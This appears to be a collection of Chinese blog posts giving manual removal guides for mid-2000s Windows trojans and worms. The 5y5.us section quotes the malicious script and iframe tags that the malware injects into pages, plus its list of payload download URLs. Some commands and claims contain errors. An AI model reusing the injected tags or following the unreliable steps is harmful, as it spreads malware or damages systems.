　　重启后，提示有服务出错，到管理工具下的“服务”一看，才终于发现了该病毒的真实面目:原来“服务”里面有一栏“Windows Login”，属性显示服务名称是“MpR”，可执行文件路径正是“C:\WINNT\SYSTEM32\explored.exe -services”。

　　这就说明了为什么进程中止不了，删掉注册表中系统启动项也没用。也就是说，当初应该到服务里将该服务停止，而不是在任务管理器试图将其删除。

　　最后就病毒查杀的心得作一点小结:上述病毒发作都有一定迹象，例如CPU占满，网络带宽占满(可以通过网络连接状态看，如果后台没有运行什么进程，网络接口上收/发包数激增，就很可能是中毒或是连接的网络上有机器中毒)，因为平时要保持警惕，发现异常就赶紧查毒。

　　最好是用查毒软件，用任务管理器有时被骗，现在的病毒起名往往跟系统程序相似甚至相同，例如explored, smsss(smss是系统程序)，svchost等等。最好知道真正的系统程序所在目录，例如系统svchost.exe应该在system32下，而病毒可能藏在system32\drivers下。

　　病毒的自启动可能通过很多途径:注册表，INI文件，甚至——象explored这样——通过服务启动。

　　与其中了毒再查再杀，不如切实做好防护措施——补丁，病毒保护，防火墙，一个都不能少啊!

admin

infostealer病毒木马清除方法
一、请先去把系统设置为“显示隐藏文件”，因为病毒以隐藏属性伪装，不做此设置将无法看到它，设置的方法如下（如果系统已经做了此设置可以跳过这一步）： 打开“我的电脑”； 依次打开菜单“工具/文件夹选项”； 然后在弹出的“文件夹选项”对话框中切换到“查看”页； 去掉“隐藏受保护的操作系统文件(推荐)”前面的对钩，让它变为不选状态； 在下面的“高级设置”列表框中改变“不显示隐藏的文件和文件夹”选项为“显示所有文件和文件夹”选项； 去掉“隐藏已知文件类型的扩展名”前面的对钩，也让它变为不选状态； 最后点击“确定”。

　　二、按“Ctrl+Alt+Del”键弹出任务管理器，找到EXPL0RER.EXE进程（注意第5个字母是数字0不是字母O），找到它后选中它并点击“结束进程”以结束掉木马进程。然后迅速做下面一步，只所以要迅速是因为如果动作慢的话，木马可能会自动恢复而再次运行起来，这样就无法删除掉其他木马文件了（如果EXPL0RER.EXE进程再次运行起来需要重做这一步）；

　　三、打开资源管理器进入到 “系统目录\Winnt\System32”下（如果您的win2000/nt/xp安装在C盘则就是 C:\Winnt\System32）。找到EXPL0RER.EXE文件（注意第5个字母是数字0不是字母O）、SysModule32.dll文件，然后直接删除它们。如果这时报告“文件正在使用无法删除”的类似提示则说明木马已经再次恢复了，需要从第二步开始重复做，并且从第二步到第三步一定要迅速，这里建议可以先打开资源管理器选中这几个待删除的文件，在做第二步即刚结束掉EXPL0RER.EXE进程后马上转过来删除这2个文件，这样一般就可以成功了；

　　四、同样在 “系统目录\Winnt\System32”目录下找到 SysModule64.dll 文件，尝试删除它，不过如果这时报告“此文件正在使用中无法删除”等类似提示也没有关系，稍后在第七步将介绍如何删除此文件；

　　五、打开资源管理器进入到 “系统目录\Winnt”下，找到一个 MFCD3O.DLL 文件，手工删除它；

　　六、打开“开始/运行”，输入“regedit”后“确定”以打开注册表编辑器，找到“HKEY_CLASSES_ROOT\CLSID\{081FE200-A103-11D7-A46D-C770E4459F2F}”键，把整个“{081FE200-A103-11D7-A46D-C770E4459F2F}”键全部删除。

　　七、注销当前用户或重新登录或重启电脑。之后再按第四步的方法删除掉 SysModule64.dll 文件，如果一切正常此时应该可以删除掉它了。 至此，如果一切顺利 PWSteal.Lemir.Gen 木马就应该完全从您系统中清除干净了。

admin

b]手把手教您手工剿灭QQ广告弹出木马
具体的不知道从哪天起，我的Maxthon浏览器好像不能拦截一些网站的广告了，屏幕的右下角也不时的出现如QQ广告一样的东西，一开始以为是网站和QQ的广告。但越用越不对劲，仔细一看，右下角的根本就不是QQ的广告，出来的整个广告就是一个链接，不像QQ广告外面还有一个框，鼠标放在上面是不会变成手形的，而这个广告，无论鼠标放在什么地方都是手形的。我开始怀疑我中招了，将杀毒软件升级到最新也不能查杀，打开浏览器，上网搜索，发现也有朋友中了这种木马，但该网友提供的方法并不能删除木马，无奈之下只好自己“动手”了，以下就是我的整个手工清除木马的过程，写出来与大家分享。

　　1、常规操作

　　打开任务管理器，查看进程，并没有发现什么不良进程。

　　2、深入挖掘

　　运行Regedit，依次展开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run，一看，果然多了个新家伙Advapi32，一看键值，竟然加载的是一个Dll文件，而这个文件位于C:\WINDOWS\Downloaded Program Files目录下的_IS_0518目录中。找到了根源就好办了，先删除了启动项，再删除对应的木马文件就行了，但到了C:\WINDOWS\Downloaded Program Files目录一看，发现这些文件根本看不到（开启了显示隐藏文件项）。且重启之后启动项又出现了，很显然，这个木马监视注册表，且文件隐藏。为了剿灭彻底，以下步骤是进入安全模式后进行的（开机时按住F8键或Ctrl键不放直到启动菜单出现）。

　　在第三步之前，我曾尝试直接用第四步的方法删除木马文件，但发现重启之后木马并没有消失，因此初步判断该木马存在备份文件。

　　3、清除木马备份文件

　　打开“我的电脑”进入C:\Windows目录，发现一个可疑目录Backup，进去一看，果然启动项加载的Dll文件也在里面，但启动项加载的却不是这个目录中的文件，很显然这个目录就是木马的备份，先删除这个备份目录再说，但刚刚删除，大概一两秒的时间这个目录又被重新建立。这个木马还真狡猾，竟然在安全模式还能自动加载且监视备份文件，一旦备份文件被删除，马上又会建立。正所谓“以彼之道还施彼身”，它能监视且能自动建立备份目录，我如果能先将目录删除，然后抢在它的前面建立目录不就行了吗？因为Windows是不允许同一目录下有两个文件或目录同名的。但从备份目录被删除到被重新建立中间的间隔太短了，手工肯定是不行的，那么就用Dos时代的批处理吧！先建立如下的批处理文件，命名为Kill.bat，双斜杠之后是注释，实际操作时无需输入。

　　Move c:\windows\backup c:\windows\bak //将Backup目录重命名为Bak

　　Md c:\windows\backup //在C:\windows下建立Backup目录

　　这时再打开“我的电脑”，依次进入C:\windows目录，将Bak目录删除，即完成了木马备份文件的删除。

　　4、清除木马文件

　　重新建立一个批处理文件，命名为Kill2.bat，内容如下。

　　cd c:\ //将当前路径改为C:盘的根目录

　　cd C:\WINDOWS\Downloaded Program Files //将当前路径改为C:\WINDOWS\Downloaded Program Files

　　move _IS_0518 c:\bak//将当前目录下的_IS_0518目录移动到C:根目录下并重命名为bak

　　打开“我的电脑”，进入C:\，删除Bak目录，再进入C:\windows目录，删除Backup目录，即完成了木马文件的清除。

　　5、清理注册表

　　运行Regedit，分别将下面所列的键删除。HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Advapi32

　　HKEY_CURRENT_USER/Software/advapi32

　　至此，Advapi32木马（因为在网上也没查到此木马的名字，所以就用它的自启动项键名来代替了）手工清理完毕。

　　注：

　　1.第三步和第四步顺序千万不能对调，因为只有先删除备份文件，再删除木马文件，这时因为木马文件没有了，备份文件也没有了，所以木马也就没办法重新建立文件了。

　　2.以前也在报刊上看到过手工清除木马的例子，但大部分都是一些利用进程查看工具结束进程来实现的，由于此木马进程伪装隐蔽，笔者曾用IceSword查看，虽能初步判断木马隐藏在Svchost.exe进程中，但由于Windows XP中Svchost.exe进程比较多，所以不好判断其具体的隐藏位置，结束进程的方法也就不好实现了，反而用本文所提的方法就能轻松将木马剿灭。

　　3.本方法在Windows XP Pro ＋ SP2下测试通过。

admin

全面解决Generic host process for win32 services
解决WINXP系统开机后弹出Generic host process for win32 services 遇到问题需要关闭！
　　出现上面这个错误一般有三种情况。
　　1.就是病毒。开机后会提示Generic Host Process for Win32 Services 遇到问题需要关闭”“Remote Rrocedure Call (RPC)服务意外终止，然后就自动重起电脑。一般该病毒会在注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 下建立msblast.exe键值，还会在c:\windows\system32目录下会放置一个msblast.exe的木马程，

　　解决方案如下：
　　RPC漏洞
　　详细描述:
　　最近发现部分RPC在使用TCP/IP协议处理信息交换时不正确的处理畸形的消息导致存在一个安全漏洞。该漏洞影响使用RPC的DCOM接口，这个接口用来处理由客户端机器发送给服务器的DCOM对象激活请求(如UNC路径)。如果攻击者成功利用了该漏洞将获得本地系统权限，他将可以在系统上运行任意命令，如安装程序、查看或更改、删除数据或者是建立系统管理员权限的帐户等.

　　已发现的一个攻击现象：
　　攻击者在用户注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 下建立一个叫“msupdate”(估计有变化)的键，键值一般为msblast.exe
　　C:\windows\system32目录下会放置一个msblast.exe的木马程序.
　　另外受攻击者会出现“Generic Host Process for Win32 Services 遇到问题需要关闭”“Remote Rrocedure Call (RPC)服务意外终止，Windows必须立即重新启动”等错误信息而重启。

　　如果已受攻击，建议先拔掉网线，在任务管理器中结束msblast.exe进程，清除注册表中的相应条目，删除system32下的木马程序，最后打补丁。(系统若是SP2，不用打补丁。)

　　第二种情况是排除病毒后，还出现这样的问题，一般都是IE组件在注册表中注册信息被破坏，可以按下面的方法去解决该问题：

　　1。 在"开始"菜单中打开"运行"窗口，在其中输入"regsvr32 actxprxy.dll"，然后"确定"，接着会出现一个信息对话 框"DllRegisterServer in actxprxy.dll succeeded"，再次点击"确定"。
　　2 再次打开"运行"窗口，输入"regsvr32 shdocvw.dll
　　3 再次打开"运行"窗口，输入"regsvr32 oleaut32.dll
　　4 再次打开"运行"窗口，输入"regsvr32 actxprxy.dll
　　5 再次打开"运行"窗口，输入"regsvr32 mshtml.dll
　　6 再次打开"运行"窗口，输入"regsvr32 msjava.dll
　　7 再次打开"运行"窗口，输入"regsvr32 browseui.dll
　　8 再次打开"运行"窗口，输入"regsvr32 urlmon.dll
　　如果排除病毒问题后，做完上面的几个IE组件注册一般问题即可得到解决。

　　3.如果电脑有打印机，还可能是因为打印机驱动安装错误，也会造成这个错误。解决方法如下：

　　重装打印机驱动程序。

　　一般情况下做到上面三步后，该问题即可得到全面解决。

admin

详细分析系统进程 手工搞定可疑病毒
简单地说，进程是程序在计算机上的一次执行活动。当你运行一个程序，你就启动了一个进程。进程又分为系统进程和用户进程。系统进程主要用于完成操作系统的功能，而QQ、Foxmail等应用程序的进程就是用户进程。

　　进程的重要性体现在可以通过观察它，来判断系统中到底运行了哪些程序，以及判断系统中是否入驻了非法程序。正确地分析进程能够帮助我们在杀毒软件不起作用时，手动除掉病毒或木马。

　　瞭望进程

　　如何知道系统中目前有哪些进程?在Windows98/Me/2000/XP/2003中，按下“Ctrl+Alt+Delete”组合键就可以直接查看进程，或打开“Windows 任务管理器”的“进程”选项来查看进程。通常来说，系统常见的进程有winlogon.exe，services.exe，explorer.exe，svchost.exe等。要熟悉进程，首先就要熟悉最常见的系统进程，这样当发现其它奇怪的进程名(如HELLO，GETPASSWORD，WINDOWSSERVICE等等)时就方便判断了。

　　常规杀灭进程法

　　1.有的进程在进程选项中无法删除，这时可以打开注册表编辑器(在“开始→运行”中键入regedit)，找到“HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun”下面的键，将可疑的选项删除。

　　2.另外，还可以通过系统的“管理工具”里面的“服务”查看目前的全部进程。这里重点要看服务中启动选项为“自动”的那部分进程，检查它们的名字、路径以及登录账户、服务属性的“恢复“里面有没有重启计算机的选项(有些机器不断属性的重新启动的秘密就在这里)。一旦发现可疑的名字需要马上禁止此进程的运行。

　　而要彻底删除这些程序进程可以用下面的办法:

　　打开注册表编辑器,展开分支“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices”,在右侧窗格中显示的就是本机安装的服务项，如果要删除某项服务，只要删除注册表中相关键值即可。

　　3.除了上面两种方法，我们还可以先查看这个进程文件所在的路径和名称。重启系统，按F8键进入安全模式，然后在安全模式下删除这个程序。

　　这里，笔者编写了容易被大家认出来的非法进程服务(系统进程)举例说明:HELLO-WORLD SERVICE 1。我们可以轻松地在进程列表和“服务”中找到它。根据上面的方法，我们可以把这个进程杀掉或禁用。

　　不少病毒和木马是以用户进程的形式出现的，所以大部分人认为“病毒是不可能获得‘SYSTEM’权限的”。其实，这是个错误的想法，很多病毒或木马也能获得SYSTEM权限，并伪装成系统进程出现在你面前。所以这类病毒就相当容易迷惑人，遇到这种情况，只有不断提高并关注系统安全方面的知识，才能准确判断该进程是否安全。

admin

autorun.inf sxs.exe病毒手动解决
一、确认中已中此病毒：
　　依次执行 开始--运行--输入"cmd"--输入"X:"(X为盘符可以是D盘，可以是E盘。)--输入"dir /a/w"
　　如果可以看到autorun.inf　和sxs.exe 那确定你的系统已经中此病毒。

　　二：解决方法：
　　这时候在纯DOS里,运行以下命令
　　比如E盘
　　e:
　　attirb -s -r -h autorun.inf
　　del autorun.inf
　　attrib -s -r -h sxs.exe
　　del sxs.exe
　　f:
　　attirb -s -r -h autorun.inf
　　del autorun.inf
　　attrib -s -r -h sxs.exe
　　del sxs.exe
　　.......................

　　每个盘符进行操作
　　如果不幸U盘或移动存储中标了,在干净的系统上插入U盘,注间:插入之前按住Shift键,这是防止这个U盘自动运行.否则所谓的干净又变成垃圾了.
　　清除成功后再去行还原或者重装,注意,一定要全部清除所有磁盘的 autorun.inf sxs.exe否则还是会中病毒的.

admin

敲诈者(Trojan.Disclies.e)解决方案
该木马程序以敲诈勒索钱财为目的，使得感染该木马的计算机用户系统中的指定数据文件被恶意隐藏，造成用户数据丢失。截至目前为止，在国内已经出现了因感染该木马程序而导致计算机系统数据文件丢失的情况。

　　病毒名称：敲诈者（Trojan.Disclies.e）
　　病毒类型： 木马程序
　　感染系统：Windows 9X/Me/NT/2000/XP
　　病毒介绍：
　　该木马程序运行后，可恶意隐藏计算机用户系统中的文档，同时在系统里出现可以帮助计算机用户修复丢失掉的数据信息的文本文件“拯救磁盘.txt”，目的是向受感染的计算机用户索取钱财。

　　1、生成病毒文件
　　计算机用户一旦受到该木马程序的感染，会在系统目录%System％下生成自身的拷贝，名称为redplus.exe。（其中，%System%在Windows 95/98/Me 下为C:\Windows\System，在Windows NT/2000下为C:\Winnt\System32，在Windows XP下为 C:\Windows\System32）

　　2、生成文本文件“拯救硬盘.txt”
　　木马程序进入受感染计算机用户的系统以后，会在“开始\所有程序\启动”里生成一个文本文件“拯救硬盘.txt”，其内如如下：

　　“1、你的硬盘资料丢失了......

　　2、你必须使用磁盘修复工具......
　　…………

　　7、按以上方法做的，一定能修复的资料包括：”

　　当用户按照“拯救磁盘.txt”中描述的步骤，运行redplus.exe后，会显示“……如何获得正版软件的序列号？必须按一下方法做”

　　3、隐藏文档
　　该木马程序一旦被运行以后，会在计算机系统根目录下建立属性为系统、隐藏和只读的备份文件夹“控制面板”，同时它会搜索计算机系统中所有后缀名为.xls、.doc、.mdb、.ppt、.wps的文件，找到后把这些文件移动到备份文件夹中，这样计算机用户的数据文件就被隐藏起来，表面上看起来是系统中上述文件丢失了，已达到向受感染的计算机用户索取钱财的目的。

　　4、终止进程
　　该木马程序运行时，还会试图终止除几个系统进程之外的所有系统正在运行的进程程序。如果计算机系统中装有反病毒软件和一些病毒分析工具，木马也会将其进程终止，以达到保护自己的目的。

　　手动解决方法：
　　1、打开工具选项—〉文件夹选项—〉选择显示所有文件和文件夹并且将隐藏受保护的操作系统文件前的√去掉。
　　2、将根目录下的名为“控制面板”隐藏文件夹用WinRAR压缩，然后启动WinRAR，切换到该文件夹的上级文件夹，右键单击该文件夹，在弹出菜单中选择"重命名"。
　　3、去掉文件夹名“控制面板”后面的ID号{21EC2020-3AEA-1069-A2DD-08002B30309D}，即可变为普通文件夹了；也可直接进入该文件夹找回丢失的文件。

admin

Taskmgr.exe病毒木马解决办法及专杀
我电脑最近出现一个taskmgr.exe，CPU使用倒很稳定，可是进程数老是飚到27—30之间，以前都是21—25的，我在超级兔子里面找，说是个间谍软件，我不知道怎么清除，清各位高手看看，还有我的QQ没有中尾巴不会自动发信息，网站我有禁止恶意网站篡改，所以我也不知道是不是中病毒了！如果解决了，

答：
taskmgr - taskmgr.exe - 进程信息
进程文件： taskmgr 或者 taskmgr.exe
进程名称： The Windows Task Manager.

描述：
taskmgr.exe用于Windows任务管理器。它显示你系统中正在运行的进程。该程序使用Ctrl+Alt+Del打开，这不是纯粹的系统程序，但是如果终止它，可能会导致不可知的问题。

一般来说应该上“任务管理器”，但如果同时出现两个的话，有可能是一个QQ病毒
看这里：
二、QQ“缘”病毒

病毒特征：
该病毒用VB语言编写，采用ASPack压缩，利用QQ消息传播。运行后会将IE默认首页改变为：HTTP://WWW.**115.COM/，如果你发现自己的IE首页被修改成以上网址，就是被该病毒感染了。

病毒会利用QQ发送例如“今天在网上下了本电子书，书名叫《缘》，写得不错，而且书的作者的名字很巧…………点击下面这个地址可以下载这本书”；“1937年12月13日，300000南京人民被侵华日军集体大屠杀！！！所有的中国人都不应忘记这个日子，从始至终日本人都没有改变它们的野心!中华儿女要团结自强牢记历史，我们要时刻警惕日本人的野心，钓鱼岛是中国的领土!!!台湾是中国不可分割的一部份!!!请你将此消息发给你QQ上的好友!”等消息，消息里的链接是病毒网址。

清除方法：
使用了下面的办法将其彻底删除。 找到下列文件:
C:\windows\system\noteped.exe
C:\windows\system\Taskmgr.exe
C:\Windows\noteped.exe
C:\Windwos\system32\noteped.exe

删除掉:其中Taskmgr.exe 要先打开"window 任务管理器",选中进程"Taskmgr.exe",杀掉
注意:有两个名字叫"Taskmgr.exe"进程,一个是QQ病毒,一个是你刚才打开的"Window 认为管理器"
然后到注册表中找到"\HKey_Local_Machine\software\Microsoft\windows\CurrentVersion\Run"
找到"Taskmgr" 删除

如果你还不明白那请你先找到那几个文件，然后再按下面步骤操作:
1.在任务栏上点击鼠标右键，选择任务管理器
2.选择进程里的Taskmgr.exe，但我后来又测试也进行名称不一定是大写的，也有可能是小写，一般排在上面的一个是。
3.点击开始-运行，输入Regedit进入注册表
4.在注册表中找到 "\HKey_Local_Machine\software\Microsoft\windows\CurrentVersion\Run，将Taskmgr"项删除"。

删除后重启计算机，《缘》QQ病毒宣布彻底删除。
另外提醒大家，尽快更新你的IE到IE6 SP1 这样可以减少很多的IE被改机会

admin

新病毒 “5Y5.us 病毒”处理办法
此病毒应该就是在这几天前发做,是用于盗取密码为主,中毒的主机还会自动进行ARP攻击使网络变的非常卡或根本连接不上网络。
此病毒。还会在局网传播。也就是。你家有10台电脑同用一条ADSL。其中一台中了。就会全部都中了。
在微软还没发布补叮时。建议少去不知名网站。小心中毒。。。

病毒中毒现象.打开任何网站时.会在你所打开的网站加载一个地址.那地址就是 HXXP://5Y5.US

本机中时.不开网页不会没事.一但你开了.就加载了.特别要注意的事.打开网页左下角的的状态栏.
注意这个病毒至今暂时无法被今天的卡巴斯基杀掉、瑞星、360安全卫士之类查杀，也无专杀工具。

用路由上网的朋友可以把5y5.us和7y7.us都加进“域名过滤”当中。

关于7y7.us与ws91.com 进行的APR攻击:
<script src="http://www.7y7.us/oK/Vernum.js"></script>
<script src="http://www.7y7.us/oK/New.js"></script>

C:\WINDOWS\~tmp4704.exe
hTTp://7y7.us/oK/svchost.exe
木马生成到这
C:\program files\internet explorer\plugins\
BinNice.dll
BinNice.bak

1、复制自身到如下路径：
C:\ProgramFiles\InternetExplorer\PLUGINS\BinNice.bak
释放病毒DLL文件到如下路径：
C:\ProgramFiles\InternetExplorer\PLUGINS\BinNice.dll

2、修改注册表，添加如下表项，是病毒每次系统启动时加载自身：
HKCR\CLSID\{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}\(Default)
HKCR\CLSID\{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}\InProcServer32
(Default)="C:\ProgramFiles\InternetExplorer\PLUGINS\BinNice.dll"
HKCR\CLSID\{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}\InProcServer32
"ThreadingModel"="Apartment"

3、安装全局钩子，将病毒dll文件注入系统中存在的进程。
4、当发现注入的进程为explorer.exe或VerCLSID.exe时，连接网络到如下网址下载病毒到本地并运行：

内容来自反病毒
h**p://7y7.us/s**n/csrss.exe
h**p://7y7.us/s**n/svchost32.exe
h**p://7y7.us/s**n/smss.exe
h**p://7y7.us/s**n/services.exe
h**p://7y7.us/s**n/svchost.exe
h**p://7y7.us/s**n/conime.exe
h**p://7y7.us/s**n/ctfmon.exe
h**p://7y7.us/s**n/mmc.exe
h**p://7y7.us/s**n/iexplore.exe
h**p://7y7.us/s**n/srogm.exe

5、向可移动磁盘中复制如下病毒文件，传播自身：
Ghost.pif
autorun.inf

关于5y5.us:
在打开所有网页,都会自动加载以下代码:
<iframe src=http://5y5.us/ width=100 height=0 frameborder=0></iframe>
<iframe src=http://5y5.us/2/002.htm width=0 height=0></iframe> <html>

处理:
(1)立刻屏蔽那些域名的访问:
立刻关闭IE,然后用记本事打开:
C:\WINDOWS\system32\drivers\etc
下的,HOST文件...

在127.0.0.1      localhost下面,,换行,加上下面的地址:
127.0.0.1      5y5.us
127.0.0.1      www.5y5.us
127.0.0.1      www.7y7.us
127.0.0.1      7y7.us
127.0.0.1      ws91.com
127.0.0.1      www.ws91.com

保存就OK了,,访问那些网址,都不会转到127.0.0.1(本机IP)这个IP了..

(2)7y7.us专杀:
下载一个360安全卫士,,地址http://www.360safe.com/
他们网站有专杀工具...

(3)防范:
使用火狐浏览器.

(4)中毒的主机要想用ARP攻击，就得不断变化自己的MAC地址来截取和发送数据包。
看交换机上哪能个电脑的流量最大,灯狂闪,找到了,就是它

专杀工具下载地址:
http://free.ys168.com/infile/note/note_6.htm?[url]http://ys-H.ys168.com/?killvirus.rar_72e7bspnnht1bkp0c0c0com1biu14z97f1o0bsjtpm4z[/url]
http://hzyo.com/killvirus.rar

admin

高手教您利用系统自带命令查杀病毒

上网最恐怖的事莫过于新病毒出来的时候，尽管电脑上我们都装有各种强大的杀毒软件，也配置了定时自动更新病毒库，但病毒总是要先于病毒库的更新的，所以中招的每次都不会是少数，这里列举一些通用的杀毒方法，自己亲自动手来用系统自带的工具绞杀病毒：

　　一、自己动手前，切记有备无患——用TaskList备份系统进程
　　新型病毒都学会了用进程来隐藏自己，所以我们最好在系统正常的时候，备份一下电脑的进程列表，当然最好在刚进入Windows时不要运行任何程序的情况下备份，样以后感觉电脑异常的时候可以通过比较进程列表，找出可能是病毒的进程。

　　在命令提示符下输入：　TaskList /fo:csv>g:zc.csv
　　上述命令的作用是将当前进程列表以csv格式输出到“zc.csv”文件中，g:为你要保存到的盘，可以用Excel打开该文件.

　　二、自己动手时，必须火眼金睛——用FC比较进程列表文件 如果感觉电脑异常，或者知道最近有流行病毒，那么就有必要检查一下。
　　进入命令提示符下，输入下列命令：　TaskList /fo:csv>g:yc.csv
　　生成一个当前进程的yc.csv文件列表，然后输入：　FC g:\zccsv g:\yc.csy
　　回车后就可以看到前后列表文件的不同了，通过比较发现，电脑多了一个名为“Winion0n.exe”(这里以这个进程为例)不是“Winionon.exe”的异常进程。

　　三、进行判断时，切记证据确凿——用Netstat查看开放端口 对这样的可疑进程，如何判断它是否是病毒呢？根据大部分病毒（特别是木马）会通过端口进行对外连接来传播病毒，可以查看一下端口占有情况。
　　在命令提示符下输入：　　Netstat -a-n-o
　　参数含义如下：
　　a:显示所有与该主机建立连接的端口信息
　　n:显示打开端口进程PID代码
　　o：以数字格式显示地址和端口信息

　　回车后就可以看到所有开放端口和外部连接进程，这里一个PID为1756（以此为例）的进程最为可疑，它的状态是“ESTABLISHED”，通过任务管理器可以知道这个进程就是“Winion0n.exe”，通过查看本机运行网络程序，可以判断这是一个非法连接！

　　连接参数含义如下：
　　LISTENINC：表示处于侦听状态，就是说该端口是开放的，等待连接，但还没有被连接，只有TCP协议的服务端口才能处于LISTENINC状态。
　　ESTABLISHED的意思是建立连接。表示两台机器正在通信。TIME-WAIT意思是结束了这次连接。说明端口曾经有过访问，但访问结束了，用于判断是否有外部电脑连接到本机。

　　四：下手杀毒时，一定要心狠手辣——用NTSD终止进程
虽然知道 “Winion0n.exe”是个非法进程，但是很多病毒的进程无法通过任务管理器终止，怎么办？

　　在命令提示符下输入下列命令：
　　ntsd –c q-p 1756
　　回车后可以顺利结束病毒进程。

　　提示：“1756”为进程PID值，如果不知道进程的ID，打开任务管理器，单击“查看→选择列→勾上PID（进程标识符）即可。NTSD可以强行终止除Sytem,SMSS.EXE,CSRSS.EXE外的所有进程。

　　五、断定病毒后，定要斩草除根——搜出病毒原文件 对于已经判断是病毒文件的“Winion0n.exe”文件，通过搜索“本地所有分区”、“搜索系统文件夹和隐藏的文件和文件夹”，找到该文件的藏身之所，将它删除。不过这样删除的只是病毒主文件，通过查看它的属性，依据它的文件创建日期、大小再次进行搜索，找出它的同伙并删除。如果你不确定还有那些文件是它的亲戚，通过网络搜索查找病毒信息获得帮助。

　　六、清除病毒后一定要打扫战场——手动修复注册表虽然把病毒文件删除了，但病毒都会在注册表留下垃圾键值，还需要把这些垃圾清除干净。1、用reg export备份自启动。由于自启动键值很多，发现病毒时手动查找很不方便。这里用reg export+批处理命令来备份。

　　启动记事本输入下列命令：
reg export HKLM\software\Microsoft\Windows\CurrentVersion\Run fo:\hklmrun.reg
reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run f:\hklcu.reg
reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run hklml.reg

　　注：这里只列举几个常见键值的备份，其它键值请参照上述方法制作。

　　然后将它保存为ziqidong.bat在命令提示符下运行它，即可将所有自启动键值备份到相应的reg文件中，接着再输入：　copy f:\*.reg ziqidong.txt

　　命令的作用是将所有备份的reg文件输出到“ziqidong.txt”中，这样如果发现病毒新增自启动项，同上次导出自启动值，利用上面介绍的FC命令比较前后两个txt文件，即可快速找出新增自启动项目。

　　2、用reg delete删除新增自启动键值。比如：通过上面的方法在[HKER_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run],找到一个“Logon”自启动项，启动程序为“c:\windows\winlogon.exe”,现在输入下列命令即可删除病毒自启动键值：
　　reg delete HKLM\software\Microssoft\Windows\CurrentVersion\Run /f

　　3、用reg import恢复注册表。Reg de-lete删除是的是整个RUN键值，现在用备份好的reg文件恢复即可，输入下列命令即可迅速还原注册表：
　　reg import f:\hklmrun.reg

　　上面介绍手动杀毒的几个系统命令，其实只要用好这些命令，我们基本可以KILL掉大部分的病毒，当然平时就一定要做好备份工作。

　　提示：上述操作也可以在注册表编辑器里手动操作，但是REG命令有个好处，那就是即使注册表编辑器被病毒设置为禁用，也可以通过上述命令导出/删除/导入操作，而且速度更快！

　　七、捆绑木马克星——FIND
　　上面介绍利用系统命令查杀一般病毒，下面再介绍一个检测捆绑木马的“FIND”命令。相信很很多网虫都遭遇过捆绑木刀，这些“批着羊皮的狼”常常躲在图片、FLASH、甚至音乐文件后面。当我们打开这些文件的时候，虽然在当前窗口显示的确实是一幅图片（或是播放的FLASH），但可恶的木马却已经在后台悄悄地运行了。比如近日我就收到一张好友从QQ传来的超女壁纸，但是当我打开图片时却发现：图片已经用“图片和传真查看器”打开了，硬盘的指示灯却一直在狂闪。显然在我打开图片的同时，有不明的程序在后台运行。现在用FIND命令检测图片是否捆绑木马，在命令提示符输入：
　　FIND /c /I〝This program〞g:\chaonv.jpe.exe

　　其中:　　g:\chaonv.jpe.exe表示需要检测的文件

　　FIND命令返回的提示是“___G:CHAONV.EXE: 2”,这表明“G：、CHAONV.EXE”确实捆绑了其它文件。因为FIND命令的检测：如果是EXE文件，正常情况下返回值应该为“1”；如果是不可执行文件，正常情况下返回值应该为“0”，其它结果就要注意了。

　　提示：其实很多捆绑木马是利用Windows默认的“隐藏已知类型文件扩展名”来迷惑我们，比如本例的“chaonv.jpe.exe”，由于这个文件采用了JPG文件的图标，才导致上当。打开“我的电脑”，单击“工具→文件夹选项”，“单击”“查看”，去除“隐藏已知类型文件扩展名”前的小勾，即可看清“狼”的真面目。

　　八、总结最后我们再来总结一下手动毒的流程：
　　用TSKLIST备份好进程列表→通过FC比较文件找出病毒→用NETSTAT判断进程→用FIND终止进程→搜索找出病毒并删除→用REG命令修复注册表。这样从发现病毒、删除病毒、修复注册表，这完成整个手动查毒、杀毒过程。

admin

MIRC蠕虫手动清除的方法
病毒描述：
　该蠕虫病毒是一个基于irc聊天室的蠕虫，它具有irc聊天服务器功能，通过扫描网上的弱密码传播。

　　传播机理：
　　该病毒的传播机理比较简单，是通过一个批处理命令来实现的。

　　文件的内容如下：
　　从这个批处理文件我们可以很清楚的看出病毒传播的过程，它首先使用系统自带net use命令去测试空口令和弱口令账号的连接，一旦成功便是用psexec命令将fonts.exe文件考到对方的机器上运行。Fonts.exe为一个病毒的打包程序。运行该程序会在 %admin%/fonts/目录下生成一系列文件包括：
　　adobea.exe　(mirc的主程序)
　　adobes.exe　（病毒启动文件）
　　attrib.exe　 （修改文件属性程序）
　　b.exe　　　 （隐藏进程文件）
　　kill.exe　　　（远程杀进程软件）
　　psexec.exe　 （远程执行软件）
　　xdcc.exe　 （未完成的功能的）
　　abc.bat　　　(病毒传播的批处理文件)
　　abc.dll
　　abc2.dll
　　moo.dll　　　(以上三个都为adobea启动时需要的动态库文件)
　　病毒程序执行后会在注册表里添加如下的键值，以便在下次启动时能正常运行：
　　//HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//run
　　键值：AdobeA　　　　　　　%admin%\fonts\adobes.exe

　　病毒危害：
　　adobea.exe为一个修改过的irc聊天服务程序，它会在后台偷偷的运行，并将本地的信息发往国外的IRC服务器，通过IRC的脚本执行功能，入侵者可以通过其他的IRC服务器来控制被感染的机器使之成为一个功能强大的服务器（功能包括文件传输，网络扫描，DOS攻击等多项功能）

　　检测方法：
　　1）察看系统目录中FONTS目录下是否有病毒的相关文件，WINDOWS默认设置下在FONTS目录下只能看到字体文件，我们可以通过在命令行状态下使用DIR 命令察看。
　　2）察看注册表中的相关键值，看是否有上面所提的%admin%\fonts\adobes.exe键值3）使用NETSTAT –AN命令察看是否有目标端口为6667的连接

　　清除方法：
　　手动清除方法
